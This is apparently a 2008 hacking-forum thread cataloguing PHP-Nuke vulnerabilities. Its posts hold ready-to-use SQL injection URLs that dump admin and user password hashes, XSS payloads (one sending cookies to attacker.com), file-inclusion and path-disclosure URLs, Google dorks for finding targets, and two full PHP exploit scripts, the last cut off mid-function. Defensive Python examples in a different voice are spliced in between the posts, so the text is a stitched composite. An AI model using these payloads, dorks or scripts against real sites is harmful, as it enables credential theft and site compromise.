[ Overview of PHP-Nuke vulnerabilities ]

Discussion in 'Web vulnerabilities' started by [53x]Shadow, 19 Jan 2008.

  1. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Overview of PHP-Nuke vulnerabilities.

    [SQL-Injection]

    PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit

    PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit


    PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)


    PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit

    PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit

    PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit


    PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit

    PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit


    [Remote File Inclusion]

    PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability

    PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions


    [XSS]

    PHP-Nuke versions: 8.0 (by ettee)

    Example:
    Code:
    [target]/modules.php?name=Search&query=<script+src=http://someshit.net/xss.jpg+
    
    xss.jpg:
    alert (document.cookie);
    PHP-Nuke versions: 7.8

    Example:
    Code:
    http://site.com/?pagetitle=title

    [Modules Vulns]

    PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln

    PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability

    PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

    PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability

    PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit

    PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln

    PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit

    PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability

    PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit

    PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit



    [DB Structure]

    (cms)
    Code:
    [nuke_authors]
    name
    email
    pwd
    radminsuper
    Hash = md5(pwd)

    (forum)
    Code:
    [nuke_users]
    username
    user_email
    user_icq
    user_password
    user_newpasswd
    
    Hash = md5(user_password)


    [Default Paths]

    Admin:
    Code:
    [target]/admin.php
    Config:
    Code:
    [target]/config.php
     
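The [SQL-Injection] list and the [DB Structure] section above fit together: every `artid=-1 UNION SELECT ...,aid,pwd,... FROM nuke_authors` payload in this thread works because a request parameter is pasted into the SQL text, and the UNION only needs to match the column count of the original query. The following is an added example, not PHP-Nuke code: an in-memory SQLite stand-in with a constructed `nuke_authors` table (the column names come from the post, the second table, its columns and the sample rows are assumptions), a lookup written the vulnerable way, and the parameterised version that closes the hole.

```python
"""Vulnerable string-built query next to the parameterised fix.

Added example, not code from PHP-Nuke or from this thread. The schema below
is a constructed stand-in: nuke_authors uses the column names listed in the
[DB Structure] post; nuke_sections_articles and all rows are assumptions.
"""
import hashlib
import sqlite3


def build_db():
    """Constructed sample database with one admin author and one article."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE nuke_authors(
            aid TEXT, name TEXT, email TEXT, pwd TEXT, radminsuper INTEGER);
        CREATE TABLE nuke_sections_articles(
            artid INTEGER, secid INTEGER, title TEXT, content TEXT, counter INTEGER);
    """)
    # The post notes that pwd holds an unsalted md5; the password itself is a demo value.
    con.execute(
        "INSERT INTO nuke_authors VALUES (?,?,?,?,?)",
        ("admin", "Site Admin", "admin@example.invalid",
         hashlib.md5(b"constructed-demo-password").hexdigest(), 1),
    )
    con.execute(
        "INSERT INTO nuke_sections_articles VALUES (1, 1, 'Welcome', 'First article', 0)")
    return con


def view_article_vulnerable(con, artid):
    """The bug: the request parameter becomes part of the SQL text, so a
    value like '-1 UNION SELECT 0,1,aid,pwd,4 FROM nuke_authors' returns
    author credentials in place of an article. Five columns on each side
    is what makes the UNION succeed, which is why the payloads in the
    thread carry filler values such as 0,1,...,4."""
    sql = ("SELECT artid, secid, title, content, counter "
           f"FROM nuke_sections_articles WHERE artid={artid}")
    return con.execute(sql).fetchall()


def view_article_fixed(con, artid):
    """The fix: enforce the expected type, then bind the value. The bound
    parameter can never alter the query's structure."""
    try:
        artid_int = int(artid)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids with a generic empty result
    sql = ("SELECT artid, secid, title, content, counter "
           "FROM nuke_sections_articles WHERE artid=?")
    return con.execute(sql, (artid_int,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "-1 UNION SELECT 0,1,aid,pwd,4 FROM nuke_authors"
    print("vulnerable:", view_article_vulnerable(db, payload))
    print("fixed:     ", view_article_fixed(db, payload))
```

The same two-step rule (validate the type, then bind) applies to every `cid`, `lid`, `sid`, `jokeid` and `eid` parameter listed later in this thread; the integer check is what the string-built variants were missing.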
  2. iddqd

    iddqd Banned

    PHP-NUKE NukeSentinel Module

    Vulnerabilities in the autohtml.php and autohtml0.php scripts, in the filename parameter.

    [Local File Inclusion]

    PHP:
    http://site/autohtml.php?filename=../file.php 

    http://site/autohtml0.php?filename=../file.php
    [Information Leakage]

    PHP:
    http://site/autohtml.php?filename=../.htaccess 

    http://site/autohtml0.php?filename=../.htaccess 
    Using the local include, important information on the server can be discovered. In particular, .htaccess reveals the site's settings, including the full path (which constitutes full path disclosure) when NukeSentinel is used on the site. The path to its configuration can also be found, and the admins' logins and hashes obtained.

    [Full path disclosure]

    PHP:
    http://site/autohtml.php?filename=12345 
    On some sites running this script, where error output is not disabled, specifying a non-existent file produces an error message containing the full path to the script.

    (c) MustLive <mustlive_(at)_websecurity.com.ua>
     
    #2 iddqd, 19 Jan 2008
    Last edited: 19 Jan 2008
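The three findings in the post above (traversal to `../file.php`, reading `../.htaccess`, and the full-path error for a non-existent name) all come from one missing step: the `filename` parameter is never resolved and checked against the directory it is supposed to serve from. The following is an added example, not NukeSentinel or PHP-Nuke code, showing how such a parameter can be handled so that every one of those inputs is rejected with a generic message; the document root, the extension allowlist and the sample files are constructed for the demo.

```python
"""Hardened handling of a user-supplied `filename` include parameter.

Added example, not code from NukeSentinel or PHP-Nuke. It rejects the
traversal, dotfile and non-existent-file cases from the post above while
returning only a generic message (no resolved path is ever echoed).
ALLOWED_SUFFIXES and the demo document root are assumptions.
"""
import os
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".html", ".htm", ".txt"}   # assumption: static includes only


class IncludeRejected(Exception):
    """Carries a generic message; callers must not append the path."""


def resolve_include(base_dir, requested):
    base = Path(base_dir).resolve()
    # 1. Only plain relative names: no empty value, NUL byte or absolute path.
    if not requested or "\x00" in requested or os.path.isabs(requested):
        raise IncludeRejected("invalid file name")
    candidate = (base / requested).resolve()
    # 2. Containment: the resolved path must stay below base. This blocks
    #    ../ sequences and symlinks that point outside the document root.
    if base not in candidate.parents:
        raise IncludeRejected("invalid file name")
    # 3. No dotfiles in the remaining relative path (.htaccess, .git, ...).
    rel = candidate.relative_to(base)
    if any(part.startswith(".") for part in rel.parts):
        raise IncludeRejected("invalid file name")
    # 4. Extension allowlist, so config.php and friends are never served.
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise IncludeRejected("invalid file name")
    # 5. Existence check with the same generic wording: no full path disclosure.
    if not candidate.is_file():
        raise IncludeRejected("file not found")
    return candidate


def classify(base_dir, requested):
    """Return 'ok' or the generic rejection message (handy for logs/tests)."""
    try:
        resolve_include(base_dir, requested)
        return "ok"
    except IncludeRejected as exc:
        return str(exc)


def make_demo_root():
    """Constructed sample layout: a legitimate page, a .htaccess inside the
    document root, and a config.php one level above it."""
    root = Path(tempfile.mkdtemp())
    docroot = root / "htdocs"
    docroot.mkdir()
    (docroot / "page.html").write_text("<p>hello</p>")
    (docroot / ".htaccess").write_text("# constructed sample, not a real config")
    (root / "config.php").write_text("<?php /* constructed sample */")
    return str(docroot)


if __name__ == "__main__":
    demo = make_demo_root()
    for name in ["page.html", "../file.php", "../.htaccess", ".htaccess", "12345"]:
        print(f"{name!r:16} -> {classify(demo, name)}")
```

Resolving both the base directory and the candidate with `resolve()` before comparing is what makes the containment check reliable; a plain string prefix test on the unresolved path would still let `htdocs_old/../../config.php` or a symlink through. Keeping error output off in production (the post's own observation) is still needed for any message the framework itself prints.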
  3. ettee

    ettee Administrator
    Staff Member

    XSS
    Code:
    modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
    modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
    modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script>
    modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
    modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
    modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
    modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
    modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
    modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
    modules.php?name=Journal&file=friend&jid=2&yun=
    modules.php?name=Journal&file=friend&jid=2&ye=
    modules.php?name=Journal&file=add&filelist[]=
    modules.php?name=Journal&file=modify&filelist[]=
    modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
    modules.php?name=Journal&file=comment&onwhat=
    modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
    modules.php?name=Encyclopedia&op=terms&eid=1&ltr=
    modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
    modules.php?name=Encyclopedia&file=search&eid=
    modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=
    modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=
    modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
    modules.php?name=News&file=article&sid=1&optionbox=
    modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
    modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
    modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
    modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
    modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
    modules.php?name=NukeJokes&func=CatView&cat=
    modules.php?name=NukeJokes&func=JokeView&jokeid=
    modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
    modules.php?name=Downloads&d_op=viewsdownload&sid=
    modules.php?name=Search&sid=
    modules.php?name=Search&query=*&max=
    modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
    modules.php?name=Search&a=6&query=*&match=
    modules.php?name=Search&query=*&mod3=
    modules.php?name=Calendar&file=submit&type=
    modules.php?name=Calendar&file=submit&op2=Preview&day=
    modules.php?name=Calendar&file=submit&op2=Preview&month=
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
    modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
    modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
    modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
    modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
    banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
    modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=
    PHP:
    <html>
    <form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
    <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
    <input type=submit name=sub>
    <script>document.searchform.sub.click()</script>
    </html>

    Search Module(all versions)

    <img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
    <iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <

    Pool and News Module
    PHP:
    <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"
    SQL injection:
    Code:
    modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
    modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
    modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
    modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
    modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
    modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/*
    modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
    modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
    modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
    modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
    modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
    modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors
    modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
    modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
    modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
    modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
    Full Path Disclosure
    modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=oob&date=00b
    /modules/Web_Links/voteinclude.php
    /modules.php?name=Statistics&op=convert_month
    /modules.php?name=Journal&file=add&filelist=oob
    /modules.php?name=Journal&file=modify&filelist=oob
    /db/db.php
    index.php?inside_mod=1
    /modules.php?name=Downloads&d_op=menu
    /modules.php?name=Web_Links&l_op=menu
    modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob
    modules/NukeJokes/mainfunctions.php
    modules.php?name=NukeJokes&func=JokeView&jokeid=oob
    modules.php?name=NukeJokes&func=CatView&cat=oob
    modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob
    modules/Calendar/config.php
    modules/Calendar/index.php
    /modules/Calendar/submit.php
    error.php?newlang=foobar
    modules/coppermine/include/crop.inc.php
    modules/coppermine/ecard.php
    modules/coppermine/displayecard.php
    modules/coppermine/db_input.php
    modules/coppermine/config.php
    modules/coppermine/addpic.php
    modules/coppermine/phpinfo.php
    modules/NukeJokes/mainfunctions.php
    modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
    modules.php?name=NukeJokes&func=CatView&cat=foobar
    modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
    modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

    dork:
    "create the Super User" "now by clicking here"
    inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account
    intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation"
    "Warning: setlocale()"
    intitle:pHP-nuke.powered.site "create * Super User" "now * clicking here"
    "Powered by PHP-Nuke"
    Copyright © 2003 by PHP-Nuke
    "allinurl:modules.php sgallery"
    "powered by phphnuke 6.0"
    intitle:"PHP-Nuke Powered Site"
     
    #3 ettee, 19 Jan 2008
    Last edited: 20 Jan 2008
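A defender-side counterpart to the payload lists in the first post and in ettee's post above. This is an added example, not code from this thread or from PHP-Nuke: it scans Apache combined-format access-log lines for the UNION-based injections against `nuke_authors`/`nuke_users`, the double-encoded (`%253c`) XSS payloads, and the traversal and remote-include patterns catalogued here. The log lines, IP addresses and signature names are constructed for the demo; the `rfi-remote-include` rule will also flag legitimate URL-valued parameters such as the Reviews module's `url=`, so treat that one as a triage hint rather than a verdict.

```python
"""Offline detector for the PHP-Nuke attack patterns listed in this thread.

Added example, not code from the thread or from PHP-Nuke. Request paths are
URL-decoded twice (the XSS payloads above use %25xx double encoding) and the
/**/ comment obfuscation used in the SQL payloads is collapsed before matching.
SAMPLE_LOG is constructed; the signature set is an assumption, not a product rule set.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

SIGNATURES = [
    # UNION ... SELECT ... FROM <prefix>_authors / <prefix>_users (credential tables)
    ("sqli-union-nuke-tables",
     re.compile(r"\bunion\b.*\bselect\b.*\bfrom\b\s*`?\w*_(authors|users)`?", re.I | re.S)),
    ("sqli-union-generic", re.compile(r"\bunion\b(\s|\+)+(all(\s|\+)+)?select\b", re.I)),
    ("xss-script-tag", re.compile(r"<\s*(script|iframe|img|body)\b", re.I)),
    ("xss-event-handler", re.compile(r"\bon(load|error|mouseover)\s*=", re.I)),
    ("lfi-traversal", re.compile(r"\.\./|/etc/passwd|\.htaccess", re.I)),
    ("rfi-remote-include", re.compile(r"=(https?|ftp)://", re.I)),
]


def normalize(url):
    """Decode twice, turn '+' into spaces and strip /*...*/ comments."""
    decoded = unquote(unquote(url)).replace("+", " ")
    return re.sub(r"/\*.*?\*/", " ", decoded)


def module_of(url):
    """The PHP-Nuke module named by the request, or '-' if none."""
    return parse_qs(urlsplit(url).query).get("name", ["-"])[0]


def scan_line(line):
    """Return a finding dict for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    norm = normalize(m.group("url"))
    hits = [name for name, rx in SIGNATURES if rx.search(norm)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "module": module_of(m.group("url")),
            "status": int(m.group("status")), "hits": hits}


def scan(lines):
    return [r for r in (scan_line(l) for l in lines) if r]


# Constructed sample log: three lines modelled on payloads from this thread,
# one on the autohtml.php case from the second post, and two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2008:10:00:01 +0300] "GET /modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors HTTP/1.0" 200 5120',
    '203.0.113.5 - - [19/Jan/2008:10:00:02 +0300] "GET /modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.0" 200 2210',
    '203.0.113.5 - - [19/Jan/2008:10:00:03 +0300] "GET /modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script> HTTP/1.0" 200 3020',
    '198.51.100.7 - - [19/Jan/2008:10:00:04 +0300] "GET /autohtml.php?filename=../.htaccess HTTP/1.1" 200 410',
    '198.51.100.7 - - [19/Jan/2008:10:00:05 +0300] "GET /modules.php?name=News&file=article&sid=42 HTTP/1.1" 200 8800',
    '198.51.100.7 - - [19/Jan/2008:10:00:06 +0300] "GET /modules.php?name=Search&query=php-nuke HTTP/1.1" 200 6100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The double decode matters: a WAF or log filter that decodes once sees `%3cscript%3e` in the Reviews and News payloads above and never matches a `<script` rule. Grouping findings by `ip` and `module` over a day's log is usually enough to separate a scanner sweep from a real attempt against one module.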
  4. iddqd

    iddqd Banned

    PHP-Nuke <= 8.0 (sid) Remote SQL Injection

    Remote SQL Injection

    Vulnerable: PHP-Nuke <= 8.0

    Exploit:

    Code:
    <?php
    ##########################################################
    # UNPUBLISHED RST/GHC EXPLOIT
    # PHP Nuke `sid` sql injection exploit for Search module
    # POST method -
    # the best for version 8.0 FINAL
    # (c)oded by Foster & 1dt.w0lf
    ##########################################################
    # tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
    ##########################################################
    
    if (isset($_POST['Submit'])){
    $result=sendit('CONCAT("::",aid,"::",pwd,"::")');
    if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
    {$ahash = $matches[2]; $aname = $matches[1];}
    
    }
    
    function sendit($param){
    $prefix = $_POST['prefix'];
    $data = $_POST['sql_text'];
    $host = $_POST['hostname'];
    $page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
    $page .= '/modules.php?name=Search';
    $method = $_POST['method'];
    $ref_text = $_POST['ref_text'];
    $user_agent = $_POST['user_agent'];
    $result = '';
    $sock = fsockopen($host, 80, $errno, $errstr, 50);
    if (!$sock) die("$errstr ($errno)\n");
    fputs($sock, "$method /$page HTTP/1.0\r\n");
    fputs($sock, "Host: $host" . "\r\n");
    fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($sock, "Content-length: " . strlen($data) . "\r\n");
    fputs($sock, "Referer: $ref_text". "\r\n");
    fputs($sock, "User-Agent: $user_agent" . "\r\n");
    fputs($sock, "Accept: */*\r\n");
    fputs($sock, "\r\n");
    fputs($sock, "$data\r\n");
    fputs($sock, "\r\n");
    
    while (!feof($sock)) {
    $result .= fgets ($sock,8192);
    }
    fclose($sock);
    return $result;
    
    }
    
    
    ?>
    
    <head>
    <meta http-equiv=Content-Type content="text/html; charset=windows-1251">
    <TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
    <style>
    a:link{color: #000000; text-decoration: none;}
    a:visited{color: #000000; text-decoration: none;}
    a:hover,a:active{color:#e49a34; text-decoration:underline;}
    table{color:#000000;font-family:verdana;font-size:8pt;}
    .style2 {
    color: #FFFFFF;
    font-weight: bold;
    }
    .style3 {color: #E39930}
    .style5 {color: #000000; font-weight: bold; }
    </style>
    <body bgcolor="#525254">
    <form method=post>
    <p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
    <table width="900" border="0">
    <tr bgcolor="#FFFFFF">
    <td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
    <td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url
    </font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font>
    </strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930">SQL query</td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user
    agent</font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
    <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
    <input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
    </font></td>
    </tr>
    <tr>
    <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
    <td bgcolor="#999999"><select name="method" size="1" id="method">
    <option value="POST">POST</option>
    <option value="GET">GET</option>
    </select></td>
    </tr>
    <tr>
    <td bgcolor="E39930">&nbsp;</td>
    <td bgcolor="#999999">&nbsp;</td>
    </tr>
    </table>
    <p>
    <input type="submit" name="Submit" value="rock-n-roll">
    </p>
    </form>
    
    
    
    
    <font size="2">(c) RST/GHC</font>
    
    <hr size="3">
    <?
    # DEBUG
    
    print $result;
    ?>
    
    # milw0rm.com [2008-01-22]
    
     
  5. Solide Snake

    Solide Snake Banned

    Remote SQL Injection

    PHP-Nuke < 8.0

    Exploit

    Code:
    <?php
    error_reporting (E_ERROR);
    ini_set("max_execution_time",0);
    
    echo '
    +=========================================+
    | RST/GHC unpublished PHP Nuke exploit <8 |
    +=========================================+
    <+> version <8.0
    <+> Tested on 7.9 & 6.0
    ';
    
    if ($argc < 2){
    print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
    print "ex.: " . $argv[0] . " phpnuke.org 7\n";
    credits();
    exit;
    }
    
    
    /* few definitions */
    if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
    else {$prefix = $argv[3];}
    
    switch ($argv[2]){
    case "6":
    $query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
    $version = 6;
    break;
    default:
    $query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
    $version = 7;
    break;
    }
    
    $host = 'http://' . $argv[1] . '/'; # argv[1] - host
    $http = $host . $query;
    echo
    '[+] host: '.$host . '
    [+] nuke version: '.$version.'
    ';
    #DEBUG
    //print $http . "\n";
    
    $result = file_get_contents($http);
    
    preg_match("/([a-f0-9]{32})/", $result, $matches);
    if ($matches[0]) {print "Admin's Hash: ".$matches[0];
    if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
    else {echo "Exploit failed...";}
    
    credits();
    
    
    function credits(){
